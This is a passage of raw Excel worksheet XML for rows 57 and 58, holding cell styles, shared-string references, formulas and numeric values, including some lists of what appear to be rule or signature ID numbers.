      <c r="FB57" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC57" s="111" t="s">
        <v>1156</v>
      </c>
      <c r="FD57" s="111">
        <v>12.0</v>
      </c>
      <c r="FE57" s="111">
        <v>18.0</v>
      </c>
      <c r="FF57" s="101" t="s">
        <v>1157</v>
      </c>
      <c r="FG57" s="111" t="s">
        <v>1158</v>
      </c>
      <c r="FH57" s="111">
        <v>6.0</v>
      </c>
      <c r="FI57" s="111">
        <v>12.0</v>
      </c>
      <c r="FJ57" s="111" t="s">
        <v>1159</v>
      </c>
      <c r="FK57" s="111" t="s">
        <v>1157</v>
      </c>
      <c r="FL57" s="111" t="str">
        <f t="shared" si="95"/>
        <v>1448, 2001330, 2101448, 20101447, 2001329, 2009207, 2009206, 2009205, 2009208</v>
      </c>
      <c r="FM57" s="111" t="s">
        <v>1160</v>
      </c>
      <c r="FN57" s="111" t="s">
        <v>1161</v>
      </c>
      <c r="FO57" s="111">
        <v>2034857.0</v>
      </c>
      <c r="FP57" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ57" s="111">
        <v>1.0</v>
      </c>
      <c r="FR57" s="111">
        <v>2.0</v>
      </c>
      <c r="FS57" s="112">
        <v>17.0</v>
      </c>
      <c r="FT57" s="112">
        <v>5.0</v>
      </c>
      <c r="FU57" s="112">
        <v>6.0</v>
      </c>
      <c r="FV57" s="112">
        <v>2.0</v>
      </c>
      <c r="FW57" s="112">
        <v>16.0</v>
      </c>
      <c r="FX57" s="112">
        <v>16.0</v>
      </c>
      <c r="FY57" s="112">
        <v>2.0</v>
      </c>
      <c r="FZ57" s="112">
        <v>0.0</v>
      </c>
      <c r="GA57" s="112">
        <v>2.0</v>
      </c>
      <c r="GB57" s="112">
        <v>2.0</v>
      </c>
      <c r="GC57" s="112">
        <v>4.0</v>
      </c>
      <c r="GD57" s="112">
        <v>4.0</v>
      </c>
      <c r="GE57" s="112">
        <v>2.0</v>
      </c>
      <c r="GF57" s="112">
        <v>10.0</v>
      </c>
      <c r="GG57" s="112">
        <v>10.0</v>
      </c>
      <c r="GH57" s="113">
        <f t="shared" si="39"/>
        <v>1.666666667</v>
      </c>
      <c r="GI57" s="113">
        <f t="shared" si="40"/>
        <v>1.333333333</v>
      </c>
      <c r="GJ57" s="113">
        <f t="shared" si="41"/>
        <v>0.6666666667</v>
      </c>
      <c r="GK57" s="113">
        <f t="shared" si="42"/>
        <v>3</v>
      </c>
      <c r="GL57" s="113">
        <f t="shared" si="43"/>
        <v>2</v>
      </c>
      <c r="GM57" s="113">
        <f t="shared" si="44"/>
        <v>1</v>
      </c>
      <c r="GN57" s="113">
        <f t="shared" si="45"/>
        <v>8</v>
      </c>
      <c r="GO57" s="113">
        <f t="shared" si="46"/>
        <v>5</v>
      </c>
      <c r="GP57" s="113">
        <f t="shared" si="47"/>
        <v>1</v>
      </c>
      <c r="GQ57" s="114">
        <f t="shared" si="81"/>
        <v>0.6666666667</v>
      </c>
      <c r="GR57" s="113">
        <f t="shared" si="82"/>
        <v>1</v>
      </c>
      <c r="GS57" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT57" s="94" t="s">
        <v>1162</v>
      </c>
      <c r="GU57" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV57" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW57" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX57" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY57" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ57" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA57" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB57" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC57" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD57" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE57" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF57" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG57" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH57" s="116">
        <v>15511.0</v>
      </c>
      <c r="HI57" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ57" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK57" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL57" s="93">
        <v>7.0</v>
      </c>
      <c r="HM57" s="93">
        <f t="shared" si="83"/>
        <v>3</v>
      </c>
      <c r="HN57" s="93">
        <v>0.0</v>
      </c>
      <c r="HO57" s="93">
        <v>3.0</v>
      </c>
      <c r="HP57" s="93">
        <v>3.0</v>
      </c>
      <c r="HQ57" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR57" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS57" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT57" s="139" t="s">
        <v>1163</v>
      </c>
      <c r="HU57" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV57" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW57" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX57" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY57" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ57" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA57" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB57" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC57" s="120" t="str">
        <f t="shared" si="100"/>
        <v>-</v>
      </c>
      <c r="ID57" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE57" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF57" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG57" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH57" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II57" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ57" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK57" s="99">
        <v>7.0</v>
      </c>
      <c r="IL57" s="99">
        <v>0.0</v>
      </c>
      <c r="IM57" s="121">
        <f t="shared" si="97"/>
        <v>1</v>
      </c>
      <c r="IN57" s="122" t="s">
        <v>444</v>
      </c>
      <c r="IO57" s="98">
        <v>1.0</v>
      </c>
      <c r="IP57" s="123">
        <f t="shared" si="58"/>
        <v>0.3333333333</v>
      </c>
      <c r="IQ57" s="118">
        <f t="shared" si="59"/>
        <v>0.3333333333</v>
      </c>
      <c r="IR57" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS57" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT57" s="127"/>
      <c r="IU57" s="127"/>
      <c r="IV57" s="127"/>
      <c r="IW57" s="127"/>
      <c r="IX57" s="127"/>
      <c r="IY57" s="127"/>
      <c r="IZ57" s="127"/>
      <c r="JA57" s="127"/>
      <c r="JB57" s="127"/>
      <c r="JC57" s="127"/>
      <c r="JD57" s="127"/>
      <c r="JE57" s="127"/>
      <c r="JF57" s="127"/>
      <c r="JG57" s="127"/>
      <c r="JH57" s="127"/>
      <c r="JI57" s="127"/>
      <c r="JJ57" s="127"/>
      <c r="JK57" s="127"/>
      <c r="JL57" s="127"/>
      <c r="JM57" s="127"/>
      <c r="JN57" s="127"/>
      <c r="JO57" s="127"/>
      <c r="JP57" s="127"/>
      <c r="JQ57" s="127"/>
      <c r="JR57" s="127"/>
      <c r="JS57" s="127"/>
      <c r="JT57" s="127"/>
      <c r="JU57" s="127"/>
      <c r="JV57" s="127"/>
      <c r="JW57" s="127"/>
      <c r="JX57" s="127"/>
      <c r="JY57" s="127"/>
      <c r="JZ57" s="127"/>
      <c r="KA57" s="127"/>
      <c r="KB57" s="127"/>
      <c r="KC57" s="127"/>
      <c r="KD57" s="127"/>
      <c r="KE57" s="127"/>
      <c r="KF57" s="127"/>
      <c r="KG57" s="127"/>
      <c r="KH57" s="127"/>
      <c r="KI57" s="127"/>
      <c r="KJ57" s="127"/>
      <c r="KK57" s="127"/>
      <c r="KL57" s="127"/>
      <c r="KM57" s="127"/>
      <c r="KN57" s="127"/>
      <c r="KO57" s="127"/>
      <c r="KP57" s="127"/>
      <c r="KQ57" s="127"/>
      <c r="KR57" s="127"/>
      <c r="KS57" s="127"/>
      <c r="KT57" s="127"/>
      <c r="KU57" s="127"/>
      <c r="KV57" s="127"/>
      <c r="KW57" s="127"/>
      <c r="KX57" s="127"/>
      <c r="KY57" s="127"/>
      <c r="KZ57" s="127"/>
      <c r="LA57" s="127"/>
      <c r="LB57" s="127"/>
      <c r="LC57" s="127"/>
      <c r="LD57" s="127"/>
      <c r="LE57" s="127"/>
      <c r="LF57" s="127"/>
      <c r="LG57" s="127"/>
      <c r="LH57" s="127"/>
      <c r="LI57" s="127"/>
      <c r="LJ57" s="127"/>
      <c r="LK57" s="127"/>
      <c r="LL57" s="127"/>
      <c r="LM57" s="127"/>
      <c r="LN57" s="127"/>
      <c r="LO57" s="127"/>
      <c r="LP57" s="127"/>
      <c r="LQ57" s="127"/>
      <c r="LR57" s="127"/>
      <c r="LS57" s="127"/>
      <c r="LT57" s="127"/>
      <c r="LU57" s="127"/>
      <c r="LV57" s="127"/>
      <c r="LW57" s="127"/>
      <c r="LX57" s="127"/>
      <c r="LY57" s="127"/>
      <c r="LZ57" s="127"/>
      <c r="MA57" s="127"/>
      <c r="MB57" s="127"/>
      <c r="MC57" s="127"/>
      <c r="MD57" s="127"/>
      <c r="ME57" s="127"/>
      <c r="MF57" s="127"/>
      <c r="MG57" s="127"/>
      <c r="MH57" s="127"/>
      <c r="MI57" s="127"/>
      <c r="MJ57" s="127"/>
      <c r="MK57" s="127"/>
      <c r="ML57" s="127"/>
      <c r="MM57" s="127"/>
      <c r="MN57" s="127"/>
      <c r="MO57" s="127"/>
      <c r="MP57" s="127"/>
      <c r="MQ57" s="127"/>
      <c r="MR57" s="127"/>
      <c r="MS57" s="127"/>
      <c r="MT57" s="127"/>
      <c r="MU57" s="127"/>
      <c r="MV57" s="127"/>
      <c r="MW57" s="127"/>
      <c r="MX57" s="127"/>
      <c r="MY57" s="127"/>
      <c r="MZ57" s="127"/>
      <c r="NA57" s="127"/>
      <c r="NB57" s="127"/>
      <c r="NC57" s="127"/>
      <c r="ND57" s="127"/>
      <c r="NE57" s="127"/>
      <c r="NF57" s="127"/>
      <c r="NG57" s="127"/>
      <c r="NH57" s="127"/>
      <c r="NI57" s="127"/>
      <c r="NJ57" s="127"/>
      <c r="NK57" s="127"/>
      <c r="NL57" s="127"/>
      <c r="NM57" s="127"/>
      <c r="NN57" s="127"/>
      <c r="NO57" s="127"/>
      <c r="NP57" s="127"/>
      <c r="NQ57" s="127"/>
      <c r="NR57" s="127"/>
      <c r="NS57" s="127"/>
      <c r="NT57" s="127"/>
      <c r="NU57" s="127"/>
      <c r="NV57" s="127"/>
      <c r="NW57" s="127"/>
      <c r="NX57" s="127"/>
      <c r="NY57" s="127"/>
    </row>
    <row r="58" ht="153.75" customHeight="1">
      <c r="B58" s="146" t="s">
        <v>951</v>
      </c>
      <c r="C58" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D58" s="90" t="s">
        <v>952</v>
      </c>
      <c r="E58" s="90" t="s">
        <v>1164</v>
      </c>
      <c r="F58" s="90" t="s">
        <v>1165</v>
      </c>
      <c r="G58" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H58" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I58" s="92" t="s">
        <v>1166</v>
      </c>
      <c r="J58" s="92" t="s">
        <v>1167</v>
      </c>
      <c r="K58" s="92" t="s">
        <v>1168</v>
      </c>
      <c r="L58" s="93" t="s">
        <v>218</v>
      </c>
      <c r="M58" s="93">
        <v>3.0</v>
      </c>
      <c r="N58" s="93">
        <v>1.0</v>
      </c>
      <c r="O58" s="93">
        <v>0.0</v>
      </c>
      <c r="P58" s="93">
        <v>1.0</v>
      </c>
      <c r="Q58" s="93">
        <f t="shared" si="99"/>
        <v>1</v>
      </c>
      <c r="R58" s="93">
        <v>1.0</v>
      </c>
      <c r="S58" s="93">
        <v>0.0</v>
      </c>
      <c r="T58" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U58" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V58" s="96" t="s">
        <v>1169</v>
      </c>
      <c r="W58" s="96" t="s">
        <v>1170</v>
      </c>
      <c r="X58" s="132" t="s">
        <v>1171</v>
      </c>
      <c r="Y58" s="126" t="s">
        <v>1172</v>
      </c>
      <c r="Z58" s="126" t="s">
        <v>1173</v>
      </c>
      <c r="AA58" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB58" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC58" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD58" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE58" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF58" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG58" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH58" s="99" t="s">
        <v>1174</v>
      </c>
      <c r="AI58" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ58" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK58" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL58" s="100">
        <v>0.0</v>
      </c>
      <c r="AM58" s="100">
        <v>0.0</v>
      </c>
      <c r="AN58" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO58" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP58" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ58" s="100">
        <v>0.0</v>
      </c>
      <c r="AR58" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS58" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT58" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AU58" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV58" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW58" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX58" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY58" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ58" s="100">
        <v>0.0</v>
      </c>
      <c r="BA58" s="102">
        <v>3.0</v>
      </c>
      <c r="BB58" s="102">
        <v>0.0</v>
      </c>
      <c r="BC58" s="102">
        <v>0.0</v>
      </c>
      <c r="BD58" s="102">
        <v>0.0</v>
      </c>
      <c r="BE58" s="102">
        <v>0.0</v>
      </c>
      <c r="BF58" s="102">
        <v>0.0</v>
      </c>
      <c r="BG58" s="102">
        <v>0.0</v>
      </c>
      <c r="BH58" s="102">
        <v>0.0</v>
      </c>
      <c r="BI58" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ58" s="102">
        <v>0.0</v>
      </c>
      <c r="BK58" s="102">
        <v>0.0</v>
      </c>
      <c r="BL58" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM58" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN58" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO58" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP58" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ58" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR58" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS58" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT58" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU58" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV58" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW58" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX58" s="104">
        <v>0.0</v>
      </c>
      <c r="BY58" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ58" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA58" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB58" s="104">
        <v>0.0</v>
      </c>
      <c r="CC58" s="104">
        <v>0.0</v>
      </c>
      <c r="CD58" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE58" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF58" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CG58" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH58" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI58" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ58" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK58" s="104">
        <v>0.0</v>
      </c>
      <c r="CL58" s="104">
        <v>0.0</v>
      </c>
      <c r="CM58" s="105">
        <v>3.0</v>
      </c>
      <c r="CN58" s="105">
        <v>0.0</v>
      </c>
      <c r="CO58" s="105">
        <v>0.0</v>
      </c>
      <c r="CP58" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ58" s="105">
        <v>0.0</v>
      </c>
      <c r="CR58" s="105">
        <v>0.0</v>
      </c>
      <c r="CS58" s="105">
        <v>0.0</v>
      </c>
      <c r="CT58" s="105">
        <v>0.0</v>
      </c>
      <c r="CU58" s="105">
        <v>0.0</v>
      </c>
      <c r="CV58" s="105">
        <v>0.0</v>
      </c>
      <c r="CW58" s="105">
        <v>0.0</v>
      </c>
      <c r="CX58" s="105">
        <v>0.0</v>
      </c>
      <c r="CY58" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ58" s="105">
        <v>0.0</v>
      </c>
      <c r="DA58" s="105">
        <v>0.0</v>
      </c>
      <c r="DB58" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC58" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD58" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE58" s="106">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="DF58" s="106">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DG58" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH58" s="106">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI58" s="106">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="DJ58" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK58" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL58" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM58" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN58" s="108">
        <v>0.0</v>
      </c>
      <c r="DO58" s="108">
        <v>0.0</v>
      </c>
      <c r="DP58" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ58" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR58" s="108">
        <v>0.0</v>
      </c>
      <c r="DS58" s="108">
        <v>0.0</v>
      </c>
      <c r="DT58" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU58" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV58" s="108" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="DW58" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX58" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY58" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ58" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA58" s="108">
        <v>0.0</v>
      </c>
      <c r="EB58" s="108">
        <v>0.0</v>
      </c>
      <c r="EC58" s="109">
        <v>3.0</v>
      </c>
      <c r="ED58" s="109">
        <v>0.0</v>
      </c>
      <c r="EE58" s="109">
        <v>0.0</v>
      </c>
      <c r="EF58" s="109">
        <v>0.0</v>
      </c>
      <c r="EG58" s="109">
        <v>0.0</v>
      </c>
      <c r="EH58" s="109">
        <v>0.0</v>
      </c>
      <c r="EI58" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ58" s="109">
        <v>0.0</v>
      </c>
      <c r="EK58" s="109">
        <v>0.0</v>
      </c>
      <c r="EL58" s="109">
        <v>0.0</v>
      </c>
      <c r="EM58" s="109">
        <v>0.0</v>
      </c>
      <c r="EN58" s="109">
        <v>0.0</v>
      </c>
      <c r="EO58" s="109">
        <v>0.0</v>
      </c>
      <c r="EP58" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ58" s="109">
        <v>0.0</v>
      </c>
      <c r="ER58" s="110">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="ES58" s="110">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="ET58" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU58" s="110">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="EV58" s="110">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="EW58" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX58" s="110">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="EY58" s="110">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="EZ58" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA58" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
      <c r="FB58" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC58" s="111" t="s">
        <v>692</v>
      </c>
      <c r="FD58" s="111">
        <v>3.0</v>
      </c>
      <c r="FE58" s="111">
        <v>9.0</v>
      </c>
      <c r="FF58" s="101" t="s">
        <v>692</v>
      </c>
      <c r="FG58" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH58" s="111">
        <v>0.0</v>
      </c>
      <c r="FI58" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ58" s="111" t="s">
        <v>692</v>
      </c>
      <c r="FK58" s="111" t="s">
        <v>692</v>
      </c>
      <c r="FL58" s="111" t="str">
        <f t="shared" si="95"/>
        <v>2002752, 2002749, 2100527</v>
      </c>
      <c r="FM58" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN58" s="111" t="s">
        <v>692</v>
      </c>
      <c r="FO58" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP58" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ58" s="111">
        <v>0.0</v>
      </c>
      <c r="FR58" s="111">
        <v>0.0</v>
      </c>
      <c r="FS58" s="112">
        <v>3.0</v>
      </c>
      <c r="FT58" s="112">
        <v>2.0</v>
      </c>
      <c r="FU58" s="112">
        <v>2.0</v>
      </c>
      <c r="FV58" s="112">
        <v>0.0</v>
      </c>
      <c r="FW58" s="112">
        <v>9.0</v>
      </c>
      <c r="FX58" s="112">
        <v>9.0</v>
      </c>
      <c r="FY58" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ58" s="112">
        <v>0.0</v>
      </c>
      <c r="GA58" s="112">
        <v>0.0</v>
      </c>
      <c r="GB58" s="112">
        <v>0.0</v>
      </c>
      <c r="GC58" s="112">
        <v>0.0</v>
      </c>
      <c r="GD58" s="112">
        <v>0.0</v>
      </c>
      <c r="GE58" s="112">
        <v>0.0</v>
      </c>
      <c r="GF58" s="112">
        <v>0.0</v>
      </c>
      <c r="GG58" s="112">
        <v>0.0</v>
      </c>
      <c r="GH58" s="113">
        <f t="shared" si="39"/>
        <v>2</v>
      </c>
      <c r="GI58" s="113">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="GJ58" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK58" s="113">
        <f t="shared" si="42"/>
        <v>2</v>
      </c>
      <c r="GL58" s="113">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="GM58" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN58" s="113">
        <f t="shared" si="45"/>
        <v>9</v>
      </c>
      <c r="GO58" s="113">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="GP58" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ58" s="114">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="GR58" s="113">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="GS58" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT58" s="94"/>
      <c r="GU58" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV58" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW58" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX58" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY58" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ58" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA58" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB58" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC58" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD58" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE58" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF58" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG58" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH58" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI58" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ58" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK58" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL58" s="93">
        <v>0.0</v>
      </c>
      <c r="HM58" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN58" s="93">
        <v>0.0</v>
      </c>
      <c r="HO58" s="93">
        <v>0.0</v>
      </c>
      <c r="HP58" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ58" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR58" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS58" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT58" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU58" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV58" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW58" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX58" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY58" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ58" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA58" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB58" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC58" s="120" t="str">
        <f t="shared" si="100"/>
        <v>-</v>
      </c>
      <c r="ID58" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE58" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF58" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG58" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH58" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II58" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ58" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK58" s="99">
        <v>0.0</v>
      </c>
      <c r="IL58" s="99">
        <v>0.0</v>
      </c>
      <c r="IM58" s="121">
        <f t="shared" si="97"/>
        <v>0</v>
      </c>
      <c r="IN58" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO58" s="98">
        <v>0.0</v>
      </c>
      <c r="IP58" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ58" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR58" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS58" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT58" s="127"/>
      <c r="IU58" s="127"/>
      <c r="IV58" s="127"/>
      <c r="IW58" s="127"/>
      <c r="IX58" s="127"/>
      <c r="IY58" s="127"/>
      <c r="IZ58" s="127"/>
      <c r="JA58" s="127"/>
      <c r="JB58" s="127"/>
      <c r="JC58" s="127"/>
      <c r="JD58" s="127"/>
      <c r="JE58" s="127"/>
      <c r="JF58" s="127"/>
      <c r="JG58" s="127"/>
      <c r="JH58" s="127"/>
      <c r="JI58" s="127"/>
      <c r="JJ58" s="127"/>
      <c r="JK58" s="127"/>
      <c r="JL58" s="127"/>
      <c r="JM58" s="127"/>
      <c r="JN58" s="127"/>
      <c r="JO58" s="127"/>
      <c r="JP58" s="127"/>
      <c r="JQ58" s="127"/>
      <c r="JR58" s="127"/>
      <c r="JS58" s="127"/>
      <c r="JT58" s="127"/>
      <c r="JU58" s="127"/>
      <c r="JV58" s="127"/>
      <c r="JW58" s="127"/>
      <c r="JX58" s="127"/>
      <c r="JY58" s="127"/>
      <c r="JZ58" s="127"/>
      <c r="KA58" s="127"/>
      <c r="KB58" s="127"/>
      <c r="KC58" s="127"/>
      <c r="KD58" s="127"/>
      <c r="KE58" s="127"/>
      <c r="KF58" s="127"/>
      <c r="KG58" s="127"/>
      <c r="KH58" s="127"/>
      <c r="KI58" s="127"/>
      <c r="KJ58" s="127"/>
      <c r="KK58" s="127"/>
      <c r="KL58" s="127"/>
      <c r="KM58" s="127"/>
      <c r="KN58" s="127"/>
      <c r="KO58" s="127"/>
      <c r="KP58" s="127"/>
      <c r="KQ58" s="127"/>
